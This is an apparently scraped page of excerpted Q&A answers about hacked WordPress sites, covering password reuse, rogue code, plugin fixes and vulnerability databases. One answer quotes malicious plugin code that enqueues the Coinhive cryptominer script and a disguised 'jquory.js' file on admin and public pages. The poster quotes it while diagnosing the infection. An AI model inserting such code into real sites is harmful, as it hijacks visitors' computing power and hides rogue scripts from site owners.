hacked - Read For Learn

Where do hackers usually run their hacking script? [closed]

They run it on your server, just like any other script runs (including WordPress). In the log you provided, it looks like the hacker knew your password. Perhaps you are using the same password on other sites, and he somehow gained access to one of them? Always set different and complex passwords; combine a large … Read more

Why wordpress is hitting another url

I’d guess that there is some rogue code on your site. (Assumption, since I don’t know your site URL.) You’ll need to check everything: update (from known good source) everything (WP, themes, plugins), then look at each folder for a file that doesn’t have the current date (since you just updated everything). Change the credentials … Read more

WordPress installer attack

Bruteforce attack from 127.0.0.1?

Why functions.php file automatically empty?

As far as I can think of this is a server issue. This has happened to me once due to server crash. I hope you have a backup of your files.

looking for indoxploit hack solution [closed]

I fixed it by BBQ: Block Bad Queries plugin: https://wordpress.org/plugins/block-bad-queries/

Where I can find a list of WordPress security risks?

You can check the WPScan Vulnerability Database The vulnerabilities are classified in ‘WordPress’, ‘Plugins’ and ‘Themes’ at the top bar, from 2014 on. Cheers

malware in wordpress installer on dreamhost. [closed]

I found the problem.. Answering for others who might have gotten this… There is this code embedded in one of the plugins function enqueue_my_scripts() { wp_enqueue_script( ‘wp-internal’, ‘https://coinhive.com/lib/coinhive.min.js’, false, false, true ); wp_enqueue_script( ‘wp-backend’, plugins_url() . ‘/LayerSlider/assets/js/jquory.js’, false, false, true ); } add_action( ‘admin_enqueue_scripts’, ‘enqueue_my_scripts’ ); add_action( ‘wp_enqueue_scripts’, ‘enqueue_my_scripts’ ); And this javascript file Jquory.js. … Read more

Site Hacked – WordPress Divi Site – Cannot find where to fix the issue? [closed]

Disabling plugins won’t help if WordPress core has been compromised (and reinstalling WordPress won’t do much good if your hosting account has been compromised). I would recommend nuking and paving your installation with help from your hosting provider (and getting a professional to audit any necessary themes and plugins you plan to use after this … Read more

Have I been hacked – getting new site setup email for 8 localhost wordpress sites

Possibly it was just the original install emails coming through all at the same time from localhost, very late, some 2 years ago. I can’t find the original emails but then if they went into spam like these emails I wouldn’t find them. So I don’t know, hopefully its just a late localhost bottleneck finally … Read more

+ More